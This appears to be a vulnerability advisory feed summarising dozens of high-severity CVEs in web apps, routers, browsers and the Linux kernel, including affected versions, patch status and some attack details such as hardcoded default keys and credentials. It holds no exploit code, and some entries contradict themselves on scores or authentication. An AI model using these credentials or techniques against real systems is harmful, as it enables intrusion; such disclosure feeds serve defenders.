Vikunja task management application contains an authentication bypass vulnerability in its password reset logic that allows disabled user accounts to be reactivated without authorization. The ResetPassword() function unconditionally sets user status to 'Active' after password reset completion, enabling disabled users to regain full access by requesting a password reset token and completing the reset process. A working proof-of-concept Python script is publicly available demonstrating automated exploitation of this vulnerability.

Python Authentication Bypass
CVE-2026-33289 HIGH CVSS 8.8
An LDAP injection vulnerability in SuiteCRM's authentication flow allows attackers to manipulate LDAP queries by injecting control characters into user-supplied input, potentially leading to authentication bypass or information disclosure. The vulnerability affects SuiteCRM versions prior to 7.15.1 and 8.9.3, which are open-source CRM systems widely deployed in enterprise environments. While no active exploitation has been reported (not in CISA KEV), the network-exploitable nature and potential for authentication bypass makes this a serious concern for organizations using affected versions.

Authentication Bypass Information Disclosure Ldap Code Injection
CVE-2026-33288 HIGH CVSS 8.8
SQL injection in SuiteCRM's authentication layer when directory support is enabled allows authenticated attackers with low-privilege directory credentials to execute arbitrary SQL commands and escalate privileges to administrator level. The vulnerability stems from insufficient input sanitization of usernames in local database queries. SuiteCRM versions prior to 7.15.1 and 8.9.3 are affected, with no patch currently available.

Privilege Escalation SQLi
CVE-2026-33243 HIGH CVSS 8.2
A signature bypass vulnerability exists in the barebox bootloader's FIT (Flattened Image Tree) image verification mechanism. The hashed-nodes property, which lists which FIT nodes were signed, is not itself part of the cryptographic hash, allowing an attacker with high privileges and local access to modify this property and trick the bootloader into loading malicious images that were never signed. This affects barebox versions 2016.03.0 through 2025.09.2 and 2025.10.0 through 2026.03.0, with patches available in versions 2025.09.3 and 2026.03.1.

Information Disclosure
CVE-2026-33164 HIGH CVSS 7.5
A malformed H.265 PPS (Picture Parameter Set) NAL unit in libde265 prior to version 1.0.17 triggers a segmentation fault in the pic_parameter_set::set_derived_values() function, causing denial of service. Any application using affected versions of libde265 to decode H.265 video streams is vulnerable to crash via specially crafted video files or streams. The vulnerability has been patched in version 1.0.17, and a GitHub security advisory documents the issue.

Buffer Overflow Heap Overflow
CVE-2026-33156 HIGH CVSS 7.8
ScreenToGif, a widely-used screen recording application, is vulnerable to DLL sideloading attacks through a malicious version.dll file. Versions from 2.42.1 and earlier are affected when the portable executable is run from user-writable directories, which is the primary intended use case for this application. Attackers can achieve arbitrary code execution in the user's context with high impact on confidentiality, integrity, and availability. No public patches are available at the time of disclosure, and no evidence of active exploitation (KEV status) has been reported.

RCE Microsoft Windows
CVE-2026-33150 HIGH CVSS 7.8
libfuse versions 3.18.0 through 3.18.1 contain a use-after-free vulnerability in the io_uring subsystem that allows local attackers to crash FUSE filesystem processes or execute arbitrary code when thread creation fails under resource constraints. The flaw occurs when io_uring initialization fails (e.g., due to cgroup limits), leaving a dangling pointer in session state that is dereferenced during shutdown. Public exploit code exists for this vulnerability, and no patch is currently available.

Memory Corruption RCE Denial Of Service Use After Free
CVE-2026-33147 HIGH CVSS 7.3
Stack-based buffer overflow in GMT versions 6.6.0 and earlier allows local attackers to crash the application or execute arbitrary code by supplying an excessively long dataset identifier to vulnerable functions like gmt_remote_dataset_id. The vulnerability affects command-line processing of geographic data and currently lacks a public patch, leaving all affected GMT installations exposed to local exploitation.

Stack Overflow Buffer Overflow RCE
CVE-2026-33133 HIGH CVSS 7.2
WeGIA versions 3.6.5 and 3.6.6 contain an unauthenticated SQL injection vulnerability in the loadBackupDB() function that fails to validate SQL content within uploaded backup archives. An attacker can craft a malicious backup file to execute arbitrary SQL statements, including creation of rogue administrator accounts, password modification, or complete database compromise. The vulnerability was introduced in commit 370104c and patched in version 3.6.7; no active exploitation in the wild has been confirmed, but the simplicity of the attack vector and availability of proof-of-concept references via GitHub advisory suggest moderate real-world risk.

SQLi
CVE-2026-33124 HIGH CVSS 8.8
Frigate versions prior to 0.17.0-beta1 contain an authentication weakness that allows any authenticated user to change another user's password without verifying the current password via the /users/{username}/password endpoint, combined with a failure to invalidate existing JWT tokens upon password change and absence of password strength validation. An attacker who obtains a valid session token through XSS, accidental exposure, cookie theft, compromised device, or unencrypted HTTP sniffing can permanently hijack victim accounts by changing their password while maintaining session access through non-invalidated tokens. This vulnerability has not been reported as actively exploited in the wild (KEV status unknown), but the straightforward nature of the attack and the common exposure vectors for JWT tokens make this a practical threat requiring immediate patching.

XSS Authentication Bypass
CVE-2026-33075 HIGH CVSS 8.8
FastGPT versions 4.14.8.3 and below contain a critical arbitrary code execution vulnerability in the fastgpt-preview-image.yml GitHub Actions workflow that allows external contributors to execute malicious code and exfiltrate repository secrets. The vulnerability stems from unsafe use of pull_request_target with attacker-controlled Dockerfile builds that are pushed to the production container registry, enabling both direct compromise and supply chain attacks. No patch was available at the time of public disclosure, making this an unpatched remote code execution affecting the AI Agent building platform across affected versions.

RCE Docker
CVE-2026-33072 HIGH CVSS 8.2
FileRise, a self-hosted web file manager and WebDAV server, contains a critical hardcoded encryption key vulnerability in versions prior to 3.9.0. The default key 'default_please_change_this_key' is used for all cryptographic operations including HMAC token generation, AES configuration encryption, and session tokens, allowing unauthenticated attackers to forge upload tokens for arbitrary file upload and decrypt sensitive admin configuration data such as OIDC client secrets and SMTP passwords. No evidence of active exploitation (not in CISA KEV) is currently available, though the vulnerability is straightforward to exploit given the hardcoded nature of the default key.

File Upload Authentication Bypass
CVE-2026-33069 HIGH CVSS 7.5
PJSIP versions 2.16 and below contain a cascading out-of-bounds heap read vulnerability in the pjsip_multipart_parse() function that allows attackers to read 1-2 bytes of adjacent heap memory when processing SIP messages with multipart bodies or SDP content. The vulnerability affects all applications using PJSIP to process incoming SIP messages, as the flaw does not require authentication or user interaction and can be triggered remotely over the network. While the CVSS score of 6.9 reflects moderate severity with low confidentiality impact, the low attack complexity and remote exploitability make this a practical concern for SIP-based communication systems.

Buffer Overflow Information Disclosure
CVE-2026-33055 HIGH CVSS 8.1
The tar-rs Rust library versions 0.4.44 and below contain a logic flaw where PAX (POSIX.1-2001) size headers are conditionally skipped when the base tar header size is nonzero, causing the library to parse tar archives differently than other standard tar implementations like Go's archive/tar. This discrepancy allows an attacker to craft malicious tar archives that appear different when unpacked by tar-rs versus other parsers, potentially leading to information disclosure or file confusion attacks. The vulnerability affects any application using tar-rs to parse untrusted archives and expecting consistent behavior with other tar parsers, with a moderate CVSS score of 5.1 indicating low attack complexity and network accessibility.

Information Disclosure Memory Corruption
CVE-2026-33037 HIGH CVSS 8.1
WWBN AVideo open source video platform versions 25.0 and below ship with a hardcoded default administrator password ('password') in official Docker deployment files that is automatically used during installation without any forced change mechanism. Attackers can gain immediate administrative access to unpatched instances, enabling user data exposure, content manipulation, and potential remote code execution via file upload and plugin management features. The issue is compounded by weak MD5 password hashing and similarly insecure default database credentials (avideo/avideo).

RCE Information Disclosure Docker
CVE-2026-33025 HIGH CVSS 8.8
Unauthenticated SQL injection in AVideo versions before 8.0 allows authenticated attackers to manipulate database queries through unsanitized sort parameters in POST requests, potentially leading to unauthorized data access or modification. The vulnerability stems from improper use of real_escape_string() on SQL identifiers rather than string literals, rendering the escaping mechanism ineffective. Affected organizations should upgrade to version 8.0 or implement WAF rules restricting sort parameter characters to alphanumeric and underscore values.

PHP SQLi
CVE-2026-33013 HIGH CVSS 7.5
The Micronaut Framework contains an infinite loop vulnerability in its form-urlencoded body binding mechanism that occurs when array indices are processed in descending order, allowing remote attackers to trigger denial of service through CPU exhaustion and out-of-memory conditions. Versions prior to 4.10.16 and 3.10.5 are affected, with the vulnerability exploitable by sending crafted indexed form parameters without authentication. No public exploit code has been confirmed, but the issue is straightforward to trigger and has been patched in the referenced versions.

Java Denial Of Service
CVE-2026-33010 HIGH CVSS 8.1
A CORS misconfiguration vulnerability in mcp-memory-service allows any malicious website to perform cross-origin requests to the HTTP API. Versions prior to 10.25.1 of mcp-memory-service from doobidoo are affected, particularly when the HTTP server is enabled with anonymous access, allowing attackers to read, modify, and delete all stored memories without authentication. No KEV listing or public exploitation indicators are currently reported, though the vulnerability's simplicity and the availability of a GitHub security advisory suggest proof-of-concept development would be straightforward.

Cors Misconfiguration Information Disclosure
CVE-2026-32989 HIGH CVSS 8.6
Precurio Intranet Portal 4.4 contains a CSRF vulnerability that allows attackers to trick authenticated users into uploading malicious files to the server, potentially leading to remote code execution with web server privileges. A public exploit is available via PacketStorm (file ID 215644), significantly lowering the barrier for exploitation. The vulnerability carries a CVSS score of 8.8 with network-based attack vector requiring only user interaction.

CSRF RCE
CVE-2026-32954 HIGH CVSS 7.1
A blind SQL injection vulnerability exists in ERPNext, a free and open-source Enterprise Resource Planning system, affecting versions prior to 15.100.0 and beta versions 16.0.0-beta.1 through 16.7.x. The vulnerability allows authenticated attackers with low-level privileges to perform time-based and boolean-based blind SQL injection attacks through insufficiently validated parameters on certain endpoints, enabling them to infer and extract sensitive database information. This is tagged as an SQLi vulnerability and has been assigned EUVD-2026-13547 by ENISA, with patches available in versions 15.100.0 and 16.8.0.

SQLi
CVE-2026-32950 HIGH CVSS 8.8
SQLBot, an intelligent data query system based on large language models and RAG, contains a critical SQL injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that allows authenticated users with minimal privileges to achieve remote code execution on the backend server. SQLBot versions prior to 1.7.0 are affected, and attackers can exploit unsafe concatenation of Excel sheet names into PostgreSQL table names and COPY statements to inject malicious SQL commands. The vulnerability enables arbitrary command execution as the postgres user, database takeover, and sensitive file exfiltration including /etc/passwd and /etc/shadow.

SQLi RCE PostgreSQL Command Injection
CVE-2026-32949 HIGH CVSS 7.5
A Server-Side Request Forgery (SSRF) vulnerability in SQLBot, an intelligent data query system based on large language models and RAG, allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. SQLBot versions prior to 1.7.0 are affected, with the vulnerability exploitable through the /api/v1/datasource/check endpoint by configuring a malicious MySQL data source that triggers a LOAD DATA LOCAL INFILE attack during connection verification. The CVSS score of 8.7 with network-based attack vector and no privileges required indicates critical severity, though no KEV listing or EPSS data suggests exploitation in the wild has not yet been widely observed.

SSRF
CVE-2026-32942 HIGH CVSS 8.1
PJSIP versions 2.16 and earlier contain a heap use-after-free vulnerability in ICE session handling caused by race conditions between session destruction and callback execution, enabling memory corruption and potential code execution. This flaw affects all systems using vulnerable PJSIP versions for multimedia communication and currently has no available patch. With a CVSS score of 8.1, the vulnerability is remotely exploitable without authentication or user interaction.

Information Disclosure Use After Free Memory Corruption
CVE-2026-32939 HIGH CVSS 8.1
DataEase versions 2.10.19 and below contain a locale-dependent validation bypass vulnerability that allows attackers to smuggle dangerous JDBC parameters past security filters. The flaw stems from inconsistent locale handling where DataEase's validation uses the JVM default locale while H2 JDBC always uses English locale, causing Turkish locale environments to misinterpret malicious parameters like 'iNIT' (bypassing blacklist as 'İNIT' while H2 executes it as 'INIT'). This has been confirmed as exploitable in real deployment scenarios and enables authenticated attackers with low privileges to achieve high-impact code execution or data access, though there is no evidence yet of active exploitation or public proof-of-concept.

Java Authentication Bypass
CVE-2026-32933 HIGH CVSS 7.5
AutoMapper, a widely-used convention-based object-object mapper for .NET applications, contains a stack exhaustion vulnerability that allows remote attackers to crash applications via deeply nested object graphs. Versions prior to 15.1.1 and 16.1.1 are affected. An unauthenticated attacker can trigger a StackOverflowException by sending specially crafted nested objects, causing immediate application termination with high availability impact (CVSS 7.5).

Denial Of Service
CVE-2026-32888 HIGH CVSS 8.8
Open Source Point of Sale (opensourcepos) contains a critical SQL Injection vulnerability in the Items search functionality when custom attribute search is enabled. An authenticated attacker with basic item search permissions can execute arbitrary SQL queries by manipulating the search GET parameter, which is directly interpolated into a HAVING clause without sanitization. The vulnerability affects all versions up to and including 3.4.1, carries a CVSS score of 8.8 (High), and had no patch available at the time of publication.

SQLi PHP
CVE-2026-32887 HIGH CVSS 7.4
Node.js applications using Effect library versions 3.19.15 and earlier with @effect/rpc 0.72.1 and @effect/platform 0.94.2 are vulnerable to context confusion due to improper AsyncLocalStorage handling in the MixedScheduler, allowing attackers to access sensitive data from other concurrent requests through race conditions. An attacker can exploit the batching mechanism to read or modify context belonging to different requests processed in the same microtask cycle, potentially leading to data leakage between users in multi-tenant environments. No patch is currently available.

Node.js Race Condition Authentication Bypass
CVE-2026-32873 HIGH CVSS 7.5
The ewe Gleam web server contains an infinite loop vulnerability in the handle_trailers function that permanently wedges the BEAM process at 100% CPU when processing rejected trailer headers in chunked HTTP requests. Versions 0.8.0 through 3.0.4 are affected, and any unauthenticated remote attacker can exploit this before application code executes, making mitigation at the application level impossible. The vulnerability is patched in version 3.0.5, and while no active exploitation (KEV) or EPSS score is reported, the low attack complexity and network accessibility make this a readily exploitable denial-of-service condition.

Denial Of Service
CVE-2026-32829 HIGH CVSS 8.2
Information disclosure in lz4_flex compression library versions 0.11.5 and below and 0.12.0 allows attackers to read sensitive data from uninitialized memory or previous decompression operations through crafted LZ4 input that triggers out-of-bounds reads in the block-based decompression API. The vulnerability affects Ubuntu and Debian systems using vulnerable versions of lz4_flex, particularly when the safe-decode feature is disabled. No patch is currently available, leaving affected systems exposed to potential exposure of cryptographic keys and other sensitive data.

Information Disclosure
CVE-2026-32808 HIGH CVSS 8.1
pyLoad, a free and open-source download manager written in Python, contains a path traversal vulnerability in versions before 0.5.0b3.dev97 that allows arbitrary file deletion outside the extraction directory during password verification of encrypted 7z archives with non-encrypted headers. Attackers can exploit this vulnerability remotely with low complexity, requiring only user interaction, to delete arbitrary files on the system. This is assigned CVE-2026-32808 with a CVSS score of 8.1 (High severity), though no active exploitation (KEV) or public proof-of-concept has been reported at this time.

Path Traversal Python
CVE-2026-32711 HIGH CVSS 7.8
Path traversal in pydicom versions 2.0.0-rc.1 through 3.0.1 allows local attackers to read, copy, or delete arbitrary files outside the File-set root directory by crafting malicious ReferencedFileID values in DICOMDIR files. The vulnerability exists because pydicom fails to validate that resolved file paths remain within the intended File-set root before performing file I/O operations like copy(), write(), and remove(). No patch is currently available for affected versions.

Python Path Traversal
CVE-2026-32710 HIGH CVSS 8.5
Authenticated users can trigger a heap overflow in MariaDB 11.4 (before 11.4.10) and 11.8 (before 11.8.6) through the JSON_SCHEMA_VALID() function, causing denial of service and potentially remote code execution under specific memory layout conditions. The vulnerability requires valid database credentials and affects server availability and integrity across scope boundaries. No patch is currently available for vulnerable versions.

RCE Buffer Overflow Heap Overflow
CVE-2026-32701 HIGH CVSS 7.5
Qwik, a performance-focused JavaScript framework, contains an array prototype pollution vulnerability in its FormData parsing logic that affects versions prior to 1.19.2. Attackers can submit specially crafted form field names using mixed array-index and object-property keys (e.g., items.0 alongside items.toString or items.length) to inject malicious properties into objects the application expects to be arrays, leading to denial of service through malformed array states, oversized lengths, or request handling failures. The vulnerability has a CVSS score of 7.5 (High severity) with network-based exploitation requiring no authentication or user interaction, and a patch is available in version 1.19.2.

Memory Corruption Denial Of Service
CVE-2026-32318 HIGH CVSS 7.6
A man-in-the-middle vulnerability in Cryptomator for iOS versions prior to 2.8.3 allows attackers who can modify the vault.cryptomator configuration file to intercept authentication tokens by substituting malicious API endpoints while maintaining legitimate authentication endpoints. This affects users unlocking Hub-backed vaults in environments where attackers have write access to vault configuration files. No evidence of active exploitation (not in CISA KEV) has been reported, and patches are available.

Information Disclosure Hashicorp Apple iOS
CVE-2026-32317 HIGH CVSS 7.6
An integrity check vulnerability in Cryptomator for Android prior to version 1.12.3 allows attackers to tamper with the vault configuration file, enabling a man-in-the-middle attack against the Hub key loading mechanism. Attackers who can modify the vault.cryptomator file can mix legitimate authentication endpoints with malicious API endpoints to exfiltrate tokens from users unlocking Hub-backed vaults. With a CVSS score of 7.6 and requiring low attack complexity with user interaction, this vulnerability poses a moderate risk to affected users in environments where vault configuration files can be altered.

Information Disclosure Google Hashicorp Android
CVE-2026-32309 HIGH CVSS 8.7
Cryptomator's Hub-based unlock flow contains a protocol downgrade vulnerability that allows the application to communicate with Hub endpoints over plaintext HTTP instead of enforcing HTTPS. Cryptomator versions prior to 1.19.1 are affected, exposing OAuth bearer tokens, key-loading traffic, and endpoint-level trust decisions to network interception and tampering by active attackers. This is a verified GitHub security advisory with patches available in version 1.19.1, though no EPSS score or KEV listing indicates limited evidence of active exploitation.

Information Disclosure Hashicorp
CVE-2026-32303 HIGH CVSS 7.6
Cryptomator versions prior to 1.19.1 contain an integrity check vulnerability that allows attackers to tamper with the vault.cryptomator configuration file, enabling man-in-the-middle attacks during Hub key loading. Attackers can mix legitimate authentication endpoints with malicious API endpoints to exfiltrate access tokens from users unlocking Hub-backed vaults in environments where vault configuration files can be modified. The CVSS score of 7.6 indicates high severity with network attack vector requiring low privileges and user interaction, though no active exploitation (KEV) or public POC has been reported at this time.

Information Disclosure Hashicorp
CVE-2026-31836 HIGH CVSS 8.1
A mass assignment vulnerability in Checkmate's user profile update endpoint allows any authenticated user to escalate their privileges to superadmin level, bypassing all role-based access controls. Checkmate versions 3.5.1 and prior are affected, an open-source self-hosted server monitoring tool from Bluewave Labs. Attackers can gain complete administrative access to view all users, modify critical configurations, and access sensitive system data, though no public patches are currently available.

Authentication Bypass
CVE-2026-29189 HIGH CVSS 8.1
A critical access control vulnerability exists in the SuiteCRM REST API V8 where multiple endpoints lack proper ACL (Access Control List) validation, enabling authenticated users to access and modify data beyond their authorized permissions. This affects SuiteCRM versions prior to 7.15.1 and 8.9.3, allowing privilege escalation within the CRM system where low-privileged users can potentially access sensitive customer data, modify records, or perform administrative actions. With a CVSS score of 8.1 and authentication bypass capabilities, this represents a significant security risk for organizations using affected versions.

Authentication Bypass
CVE-2026-29109 HIGH CVSS 7.2
Unsafe deserialization in SuiteCRM versions up to 8.9.2 allows authenticated administrators to execute arbitrary system commands on the server through the SavedSearch filter processing component. The vulnerability stems from improper handling of unserialized data in the FilterDefinitionProvider.php file, which fails to restrict instantiable classes when processing user-controlled input from the database. SuiteCRM 8.9.3 and later versions contain the fix.

PHP Deserialization
CVE-2026-27625 HIGH CVSS 8.1
Stirling-PDF, a locally hosted web application for PDF operations, contains a path traversal vulnerability in the /api/v1/convert/markdown/pdf endpoint that allows authenticated users to write arbitrary files outside the intended directory. Versions prior to 2.5.2 are affected, enabling attackers to overwrite writable files with the privileges of the stirlingpdfuser process account, compromising data integrity and potentially availability. The vulnerability has been patched in version 2.5.2, and while CVSS rates it 8.1 (High), authentication is required which reduces immediate risk.

Path Traversal
CVE-2026-23536 HIGH CVSS 7.5
The Feast Feature Server contains a path traversal vulnerability in its `/read-document` endpoint that allows unauthenticated remote attackers to read arbitrary files accessible to the server process, including sensitive system files, application configurations, and credentials. Red Hat OpenShift AI (RHOAI) deployments are confirmed affected across multiple versions. The vulnerability is rated 7.5 (High) with network-based exploitation requiring no authentication or user interaction, though no active exploitation (KEV) or public proof-of-concept is currently documented.

Path Traversal Redhat
CVE-2026-23278 HIGH CVSS 7.8
A resource management flaw in the Linux kernel's netfilter nf_tables subsystem fails to properly iterate over all pending catchall elements during transaction processing, leading to incomplete cleanup when a map holding catchall elements is destroyed. This affects Linux kernel versions across multiple stable branches and can result in memory corruption, information disclosure, or denial of service when crafted netfilter rule transactions are processed. The vulnerability is not known to be actively exploited in the wild, but the presence of multiple stable branch patches and specific affected kernel versions indicates kernel maintainers have treated this as a material flaw requiring coordinated remediation.

Linux Information Disclosure Redhat Suse
CVE-2026-23275 HIGH CVSS 7.8
A race condition exists in the Linux kernel's io_uring subsystem where task work flags can be manipulated on stale ring memory during concurrent ring resize operations when DEFER_TASKRUN or SETUP_TASKRUN modes are enabled. This vulnerability affects Linux kernel versions including 6.13, 6.18.19, 6.19.9, and 7.0-rc4, and could allow an attacker with local code execution capabilities to cause information disclosure or kernel memory corruption. The vulnerability has been patched across multiple stable kernel versions as evidenced by available git commits, though no active KEV status or EPSS score has been published.

Linux Information Disclosure Redhat Suse
CVE-2026-23274 HIGH CVSS 7.8
This vulnerability exists in the Linux kernel's netfilter xt_IDLETIMER module, where revision 0 rules can cause a kernel panic by attempting to reuse timer objects created by revision 1 with ALARM semantics. An attacker with the ability to insert netfilter rules (requiring CAP_NET_ADMIN or equivalent privileges) can trigger uninitialized timer_list access, leading to debugobjects warnings and kernel panic when panic_on_warn=1 is enabled. No active exploitation in the wild has been reported, but patches are available across multiple stable kernel versions.

Linux Information Disclosure Redhat Suse
CVE-2026-23273 HIGH CVSS 7.8
A use-after-free race condition exists in the Linux kernel's macvlan driver within the macvlan_common_newlink() error handling path. When a macvlan device creation fails after the network device becomes visible to the RCU (Read-Copy-Update) subsystem, the caller's subsequent free_netdev(dev) can race with ongoing packet forwarding operations, causing kernel memory corruption and potential information disclosure. This vulnerability affects Linux kernel versions 5.10 through 6.19 and later, and while no public exploit exists, the issue is reproducible via crafted netlink commands that trigger concurrent device creation and packet transmission.

Linux Information Disclosure Redhat Suse
CVE-2026-23272 HIGH CVSS 7.8
A use-after-free vulnerability exists in the Linux kernel's netfilter nf_tables subsystem where a set element can be published and removed without waiting for RCU grace period completion, allowing concurrent RCU readers to access freed memory. This affects all Linux kernel versions across multiple stable branches (4.10 and later) as indicated by the CPE cpe:2.3:a:linux:linux:*:*:*:*:*:*:*:*. An attacker with local access to manipulate netfilter rules could trigger information disclosure or denial of service by exploiting the race condition during batch insertion of elements into a full netfilter set.

Information Disclosure Linux Redhat Suse
CVE-2026-23271 HIGH CVSS 7.8
A race condition exists in the Linux kernel's perf subsystem where __perf_event_overflow() can execute with only preemption disabled (rather than IRQs disabled) on software events, creating a window for concurrent execution with perf_event_exit_event() and related cleanup functions. This race condition allows the overflow handler to access kernel structures (such as BPF programs) that are being freed concurrently, potentially leading to use-after-free conditions, memory corruption, or privilege escalation. The vulnerability affects multiple stable Linux kernel versions and has patches available across multiple kernel branches (6.12.77, 6.19.7, 7.0-rc2, and others as indicated by the git commit references).

Linux Buffer Overflow Redhat Suse
CVE-2026-22897 HIGH CVSS 8.1
Remote command execution in QuNetSwitch versions prior to 2.0.4.0415 allows unauthenticated attackers to execute arbitrary system commands over the network with no user interaction required. The vulnerability stems from improper input validation in command processing functions, enabling complete system compromise. No patch is currently available for affected versions.

Command Injection
CVE-2026-22733 HIGH CVSS 8.2
This is an authentication bypass vulnerability in Spring Boot applications using Spring Security with Actuator endpoints. When an authenticated application endpoint is declared under the CloudFoundry Actuator path, attackers can bypass authentication requirements and gain unauthorized access to protected resources. The vulnerability affects multiple versions of Spring Security from 2.7.0 through 4.0.3 and carries a high CVSS score of 8.2, though no active exploitation or proof-of-concept has been reported.

Authentication Bypass Java
CVE-2026-22324 HIGH CVSS 8.1
A PHP Local File Inclusion vulnerability exists in the ThemeREX Melania WordPress theme, allowing remote attackers to include and execute arbitrary local files on the server. All versions up to and including 2.5.0 are affected. The CVSS score of 8.1 indicates high severity with network-based attack vector, though attack complexity is rated as high; there is no evidence of active exploitation (not in KEV) or public proof-of-concept at this time.

PHP Information Disclosure Lfi
CVE-2026-22163 HIGH CVSS 7.8
Unsafe IOCTL handling in the DDK kernel module allows local attackers with limited privileges to bypass GPU memory protections and write to arbitrary physical memory through race condition exploitation. This privilege escalation vulnerability affects systems using the vulnerable DDK driver and requires no user interaction to trigger. No patch is currently available.

RCE
CVE-2026-4519 HIGH CVSS 7.0
The webbrowser.open() API in CPython accepts URLs with leading dashes, which certain web browsers interpret as command-line options rather than URLs, potentially leading to unintended command execution or information disclosure. This affects all CPython versions using the vulnerable webbrowser module. An attacker can craft a malicious URL containing leading dashes (e.g., '-P' or '--profile') that, when passed to webbrowser.open(), may trigger browser-specific behavior such as loading alternate profiles or executing browser commands, resulting in information disclosure or other security impacts.

Information Disclosure
CVE-2026-4508 HIGH CVSS 7.3
SQL injection in PbootCMS versions up to 3.2.12 allows unauthenticated remote attackers to manipulate the Username parameter in the Member Login function, potentially enabling unauthorized database access and data manipulation. Public exploit code exists for this vulnerability, and no patch is currently available.

PHP SQLi
CVE-2026-4504 HIGH CVSS 7.3
SQL injection in eosphoros-ai db-gpt versions up to 0.7.5 allows unauthenticated remote attackers to manipulate the /api/v1/editor/ endpoint and execute arbitrary database queries. Public exploit code is available for this vulnerability, and no patch has been released despite vendor notification. This vulnerability impacts confidentiality, integrity, and availability of affected systems.

SQLi
CVE-2026-4493 HIGH CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro MAC filtering configuration allows remote authenticated attackers to achieve full system compromise through manipulation of the deviceList parameter. Public exploit code exists for this vulnerability, and no patch is currently available. The flaw impacts the /goform/setMacFilterCfg endpoint with a CVSS score of 8.8.

Tenda Buffer Overflow Stack Overflow
CVE-2026-4492 HIGH CVSS 8.8
Remote code execution in Tenda A18 Pro firmware 02.03.02.28 allows authenticated attackers to achieve full system compromise through stack-based buffer overflow in the QoS configuration function. Public exploit code exists for this vulnerability and no patch is currently available, leaving deployed devices at immediate risk.

Tenda Buffer Overflow Stack Overflow
CVE-2026-4491 HIGH CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 allows remote attackers with low privileges to achieve complete system compromise through manipulation of the SetIpMacBind function arguments. Public exploit code exists for this vulnerability, and no patch is currently available. An authenticated attacker can execute arbitrary code remotely without user interaction, affecting confidentiality, integrity, and availability of affected devices.

Tenda Buffer Overflow Stack Overflow
CVE-2026-4490 HIGH CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 enables authenticated remote attackers to achieve code execution with high privileges through the setSchedWifi function. Public exploit code is available for this vulnerability, and no patch has been released, leaving affected devices exposed to active exploitation. An attacker with network access and valid credentials can trigger the overflow to compromise system integrity and confidentiality.

Tenda Buffer Overflow Stack Overflow
CVE-2026-4489 HIGH CVSS 8.8
Stack-based buffer overflow in Tenda A18 Pro firmware version 02.03.02.28 allows authenticated remote attackers to achieve complete system compromise through the /goform/fast_setting_wifi_set endpoint. Public exploit code is available and actively being weaponized against this unpatched vulnerability. Attackers with network access and valid credentials can execute arbitrary code with full system privileges.

Tenda Buffer Overflow Stack Overflow
CVE-2026-4488 HIGH CVSS 8.8
Remote code execution in UTT HiPER 1250GW firmware versions up to 3.2.7 allows authenticated attackers to overflow a buffer in the /goform/setSysAdm function via a malicious GroupName parameter. Public exploit code exists for this vulnerability, and no patch is currently available. An attacker with valid credentials can achieve complete system compromise including code execution, data theft, and denial of service.

Buffer Overflow
CVE-2026-4487 HIGH CVSS 8.8
Unauthenticated attackers can trigger a buffer overflow in UTT HiPER 1200GW firmware versions up to 2.5.3-170306 via the /goform/websHostFilter endpoint, enabling remote code execution with full system compromise. Public exploit code is available and there is currently no patch, leaving affected devices at immediate risk. The vulnerability requires only network access and valid credentials to exploit, making it readily actionable for threat actors.

Buffer Overflow
CVE-2026-4486 HIGH CVSS 7.4
Remote code execution in D-Link DIR-513 1.10 via stack-based buffer overflow in the /goform/formEasySetPassword endpoint allows unauthenticated attackers to achieve full system compromise through a malicious curTime parameter. Public exploit code exists for this vulnerability, and affected devices are no longer receiving security updates from the vendor. An attacker with network access can execute arbitrary code with high privileges without user interaction.

Buffer Overflow D-Link Stack Overflow
CVE-2026-4478 HIGH CVSS 8.1
The Yi Technology YI Home Camera 2 version 2.1.1_20171024151200 contains a cryptographic signature verification vulnerability in its HTTP firmware update handler, specifically in the home/web/ipc file component. An attacker can exploit this remotely (network-accessible) to bypass firmware integrity checks and potentially install malicious firmware, though the attack complexity is high and exploitation is considered difficult. A public exploit is available, significantly increasing risk despite the high complexity barrier.

Information Disclosure
CVE-2026-4475 HIGH CVSS 8.8
A hard-coded credentials vulnerability exists in Yi Technology YI Home Camera 2 firmware version 2.1.1_20171024151200, specifically in the home/web/ipc file component. An unauthenticated attacker on the local network can exploit these credentials to gain full access to the device with high impact on confidentiality, integrity, and availability (CVSS 8.8). The exploit has been publicly disclosed via VulDB references, and the vendor did not respond to early disclosure attempts, indicating no official patch is available.

Authentication Bypass
CVE-2026-4464 HIGH CVSS 8.8
Heap corruption in Google Chrome's ANGLE graphics library prior to version 146.0.7680.153 can be triggered remotely through a malicious HTML page, potentially enabling arbitrary code execution on affected systems. The vulnerability stems from an integer overflow condition that requires only user interaction with a crafted webpage, affecting Chrome users across Windows, macOS, and Linux platforms. A patch is available and security professionals should prioritize updating to the latest Chrome version to mitigate this high-severity risk.

Google Buffer Overflow Ubuntu Debian Chrome
CVE-2026-4463 HIGH CVSS 8.8
Heap buffer overflow in Google Chrome's WebRTC component (versions prior to 146.0.7680.153) enables remote code execution when users visit a malicious webpage, requiring only user interaction to trigger the vulnerability. An attacker can exploit this heap corruption to execute arbitrary code with the privileges of the affected browser process. A patch is available for Chrome and affected Linux distributions including Ubuntu and Debian.

Google Heap Overflow Buffer Overflow Ubuntu Debian
CVE-2026-4462 HIGH CVSS 8.8
An out of bounds read vulnerability exists in the Blink rendering engine of Google Chrome prior to version 146.0.7680.153, allowing remote attackers to read memory outside intended buffer boundaries via a specially crafted HTML page. This vulnerability (CWE-125) has been classified as High severity by the Chromium security team and enables information disclosure attacks without requiring user interaction beyond visiting a malicious webpage. A vendor patch is available, and the vulnerability affects 9 Debian releases, indicating widespread downstream impact across Linux distributions.

Google Buffer Overflow Information Disclosure Ubuntu Debian
CVE-2026-4461 HIGH CVSS 8.8
Heap corruption in Google Chrome's V8 engine prior to version 146.0.7680.153 enables remote code execution when users visit malicious websites, affecting Chrome, Ubuntu, and Debian systems. An unauthenticated attacker can craft a specially designed HTML page to trigger memory corruption and achieve complete system compromise without user interaction beyond visiting the page. A patch is available for immediate deployment.

Google Information Disclosure Ubuntu Debian Chrome
CVE-2026-4460 HIGH CVSS 8.8
Memory disclosure in Google Chrome's Skia rendering engine prior to version 146.0.7680.153 enables unauthenticated attackers to read out-of-bounds memory contents by tricking users into visiting malicious web pages. Affected users across Chrome, Ubuntu, and Debian distributions face potential information leakage including sensitive data from process memory. A patch is available for immediate deployment.

Google Buffer Overflow Information Disclosure Ubuntu Debian
CVE-2026-4459 HIGH CVSS 8.8
